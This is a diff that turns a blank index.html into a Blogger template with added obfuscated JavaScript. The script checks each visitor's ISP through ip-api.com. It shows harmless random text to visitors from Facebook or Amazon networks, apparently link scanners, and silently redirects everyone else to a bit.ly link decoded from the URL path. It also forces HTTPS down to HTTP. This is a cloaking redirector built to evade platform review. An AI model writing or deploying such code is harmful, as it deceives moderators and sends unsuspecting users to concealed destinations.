--- a/index.html
+++ b/index.html
@@ -1,18 +1,42 @@
+<?xml version="1.0" encoding="UTF-8" ?>
 <!DOCTYPE html>
-<html>
-  <head>
-<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
+<html expr:dir='data:blog.languageDirection' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='http://www.google.com/2005/gml/expr'>
+<head>
+  <title>رابطك</title>
+
+<b:skin><![CDATA[/*
+-----------------------------------------------
+Name : tharabic Cleaning Template
+Designer URL  : http://tharabic.com
+year          : 2018
+----------------------------------------------- */
+]]></b:skin>
+    <script src='https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js'/>
 <script> 
- 
-$(document).ready(function(){
-    $.ajax({url: "http://ip-api.com/json/", success: function(result){
-     alert(result);
-    }});
-});
+     //<![CDATA[
+var _0x40ff=['0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ','location','hostname','S3tdamgT3ams.bmCaBg.mq','https://facebook.com/arbswr','search','length','replace','getJSON','http://ip-api.com/json/','toLowerCase','facebook','includes','amazon','href','http://bit.ly/','https://www.facebook.com/arbswr','protocol','jihA9876543gfedcbamlktsrqpoTSCB210RQPZYXWVUzyxNMLKJIwvunOHGFED'];(function(_0x5c5d0c,_0x71e468){var _0xc9d495=function(_0x41b5d0){while(--_0x41b5d0){_0x5c5d0c['push'](_0x5c5d0c['shift']());}};_0xc9d495(++_0x71e468);}(_0x40ff,0x1da));var _0x4b6b=function(_0x4a3343,_0x1a9abb){_0x4a3343=_0x4a3343-0x0;var _0x201080=_0x40ff[_0x4a3343];return _0x201080;};var rt=_0x4b6b('0x0');var ss=rt;var tex=_0x4b6b('0x1');var t1='';var t2='';var tty=lk(window[_0x4b6b('0x2')][_0x4b6b('0x3')]);var nu=0x0;var nu1=0x0;var nu2=0x0;var web='';if(_0x4b6b('0x4')!=tty){location['href']=_0x4b6b('0x5');}function kl(_0x50ca9d){var _0x7c988='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';var _0x179b85=_0x4b6b('0x0');var _0x1b6a1b='';var _0x4e07b9=0x0;while(_0x4e07b9<_0x50ca9d['length']){if(_0x50ca9d[_0x4e07b9]=='.'){_0x1b6a1b+='.';}else{var _0x480f3b=_0x179b85[_0x4b6b('0x6')](_0x50ca9d[_0x4e07b9]);if(_0x480f3b>=0x0){_0x1b6a1b+=_0x7c988[_0x480f3b];}else{_0x1b6a1b+=_0x50ca9d[_0x4e07b9];}}_0x4e07b9++;}return _0x1b6a1b;}function lk(_0x7c5695){var _0xea1d3=_0x4b6b('0x1');var _0x2141e6=_0x4b6b('0x0');var _0x3f3a83='';var _0x314cf5=0x0;while(_0x314cf5<_0x7c5695[_0x4b6b('0x7')]){if(_0x7c5695[_0x314cf5]=='.'){_0x3f3a83+='.';}else{var _0x25e403=_0xea1d3['search'](_0x7c5695[_0x314cf5]);if(_0x25e403>=0x0){_0x3f3a83+=_0x2141e6[_0x25e403];}else{_0x3f3a83+=_0x7c5695[_0x314cf5];}}_0x314cf5++;}return _0x3f3a83;}var xpath=location['pathname'];var opath=xpath[_0x4b6b('0x8')]('/','');opath=kl(opath);$(function(){$[_0x4b6b('0x9')](_0x4b6b('0xa'),function(_0x4277b8){var _0x5156a3=_0x4277b8['isp'];var _0x57796a=_0x5156a3[_0x4b6b('0xb')]();var _0x2c0af0=_0x57796a['includes'](_0x4b6b('0xc'));var _0x1f0fd0=_0x57796a[_0x4b6b('0xd')](_0x4b6b('0xe'));if(_0x2c0af0==!![]||_0x1f0fd0==!![]){}else{if(opath[_0x4b6b('0x7')]>0x0&&opath!=''){var _0x43e4cf=opath['replace']('_','');location[_0x4b6b('0xf')]=_0x4b6b('0x10')+_0x43e4cf;}else{location[_0x4b6b('0xf')]=_0x4b6b('0x11');}}});});if(location['protocol']=='https:'){location[_0x4b6b('0x12')]='http:';}  //     ]]>
 </script>
-    </head>
-  <body>
-    
-    
-    </body>
-  </html>
+</head>
+<body>
+  <div>
+<script>
+   //<![CDATA[
+document.write(Math.floor(Math.random() * 100000000));   
+function makeid(length) {
+   var result           = '';
+   var characters       = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
+   var charactersLength = characters.length;
+   for ( var i = 0; i < length; i++ ) {
+      result += characters.charAt(Math.floor(Math.random() * charactersLength));
+   }
+   return result;
+}
+
+document.write(makeid(Math.floor(Math.random() * 100) + 1)+"<br>"+makeid(Math.floor(Math.random() * 100) + 1));
+    //     ]]>
+</script>
+
+</div>
+  <b:section class='main' id='main' showaddelement='yes'/>
+</body>
+</html>
